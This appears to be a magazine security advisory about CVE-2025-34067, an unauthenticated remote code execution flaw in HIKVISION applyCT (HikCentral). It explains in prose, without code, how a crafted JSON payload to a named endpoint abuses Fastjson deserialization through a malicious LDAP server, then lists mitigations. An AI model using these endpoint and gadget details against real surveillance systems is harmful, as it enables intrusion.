Critical HIKVISION applyCT Vulnerability (CVE-2025-34067) Allows Remote Code Execution
7th July 2025, Kathmandu
A critical security flaw (CVE-2025-34067) has been discovered in HIKVISION applyCT, also known as HikCentral, posing a serious risk to global surveillance infrastructures.
Critical HIKVISION applyCT Vulnerability
This vulnerability allows unauthenticated remote code execution (RCE) and affects thousands of security systems across government, commercial, and industrial sectors.
What is HIKVISION applyCT (HikCentral)?
applyCT, marketed as HikCentral, is a powerful security management platform developed by HIKVISION. With advanced analytics, centralized monitoring, and a scalable architecture, it’s widely adopted for managing surveillance systems, video feeds, and security devices.
However, its popularity and widespread use mean that any vulnerability can have massive, far-reaching consequences.
CVE-2025-34067: Key Technical Details:
Component Affected: applyCT (HikCentral)
Vulnerability Type: Unauthenticated Remote Code Execution (RCE)
Attack Vector: Network-based, no authentication required
Root Cause: Vulnerable use of the Fastjson library
Vulnerable Endpoint: /bic/ssoService/v1/applyCT
Exploit Mechanism: Exploits Fastjson’s auto-type deserialization feature
Attackers can send a malicious JSON payload to this endpoint, leveraging a vulnerable deserialization process to load arbitrary Java classes from a remote LDAP server—specifically via the JdbcRowSetImpl class—resulting in full remote code execution on the target server.
Proof-of-Concept (PoC) Explained
In a typical exploit:
The attacker sends a crafted POST request with a JSON payload.
The datasource field is manipulated to point to a malicious LDAP server.
The system loads the remote class and executes it.
The attacker gains unauthorized access and control over the system.
Severity Level: CRITICAL
CVSS 4.0 Score: 10.0 (Maximum)
Risk Level: Extremely High
Authentication Required: No
Potential Impact of Exploitation
Organizations using vulnerable versions of applyCT are exposed to severe risks:
Full system compromise
Unauthorized access to surveillance footage and sensitive data
Disruption or manipulation of security systems and video feeds
Lateral movement within internal networks
Financial losses, reputational damage, and legal consequences
Recommended Mitigation Steps
To defend against CVE-2025-34067, organizations must take immediate action:
1. Upgrade Immediately
Update to a patched version of HikCentral that removes the use of vulnerable Fastjson versions.
2. Restrict Endpoint Access
Block access to /bic/ssoService/v1/applyCT from all untrusted networks or external traffic.
3. Monitor LDAP Traffic
Set up alerts and monitor for suspicious outbound LDAP traffic, a potential sign of exploitation.
4. Apply Vendor Security Updates
Regularly check and apply security patches released by HIKVISION to keep your infrastructure secure.
Final Thoughts
This vulnerability in HIKVISION applyCT is a wake-up call for organizations relying on centralized surveillance platforms. With the threat of remote code execution without authentication, the stakes are higher than ever.
Immediate patching and endpoint protection are crucial to mitigating this risk. Organizations should also audit existing deployments for exposure and update security protocols accordingly.
Stay updated on cybersecurity threats and mitigation tips at ICT Frame Magazine, your trusted source for IT news and analysis in Nepal and beyond.
For more: Critical HIKVISION applyCT Vulnerability